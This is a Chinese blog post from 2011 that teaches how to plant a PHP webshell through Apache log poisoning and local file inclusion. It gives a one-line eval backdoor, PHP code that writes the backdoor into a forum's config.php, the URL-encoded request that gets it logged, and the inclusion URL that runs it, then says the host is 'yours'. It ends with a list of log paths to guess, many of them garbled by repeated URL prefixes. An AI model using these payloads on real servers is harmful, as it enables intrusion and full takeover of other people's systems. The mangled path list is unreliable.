php包含apache写马

一句话木马
<?eval($_POST[cmd]);?>  

到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句,
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是

<?$fp=fopen(“/home/virtual/www.xxx.com/forum/config.php”,”w+”);fputs($fp,”<?eval($_POST[cmd]);?>”);
fclose($fp);?>   //在config.php里写入一句木马语句

我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。
转换为
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
fclose%28%24fp%29%3B%3F%3E
我们提交
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

这样就错误日志里就记录下了这行写入webshell的代码。
我们再来包含日志,提交
http://xxx.com/z.php?zizzy=/home … /logs/www-error_log

这样webshell就写入成功了,config.php里就写入一句木马语句
OK.
http://www.xxx.com/forum/config.php这个就成了我们的webshell
直接用lanker的客户端一连,主机就是你的了。

PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用

其他的日志路径,你可以去猜,也可以参照这里。
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/var/log/httpd/access_log
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
http://www.cnblogs.com/apache/logs/error.log
http://www.cnblogs.com/apache/logs/access.log
http://www.cnblogs.com/../apache/logs/error.log
http://www.cnblogs.com/../apache/logs/access.log
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/httpd/logs/acces_log
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/httpd/logs/acces.log
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/httpd/logs/error_log
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/httpd/logs/error.log
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/var/www/logs/access_log
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/var/www/logs/access.log
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/usr/local/apache/logs/access_log
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/usr/local/apache/logs/access.log
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/var/log/apache/access_log
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/var/log/apache/access.log
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/var/log/access_log
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/var/www/logs/error_log
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/var/www/logs/error.log
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/usr/local/apache/logs/error_log
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/usr/local/apache/logs/error.log
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/var/log/apache/error_log
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/var/log/apache/error.log
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/var/log/access_log
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/var/log/error_log
/var/log/httpd/access_log      
/var/log/httpd/error_log    
../apache/logs/error.log    
../apache/logs/access.log
http://www.cnblogs.com/apache/logs/error.log
http://www.cnblogs.com/apache/logs/access.log
http://www.cnblogs.com/../apache/logs/error.log
http://www.cnblogs.com/../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log

posted on 2011-05-17 19:21  =_=!  阅读(165)  评论(0编辑  收藏  举报

导航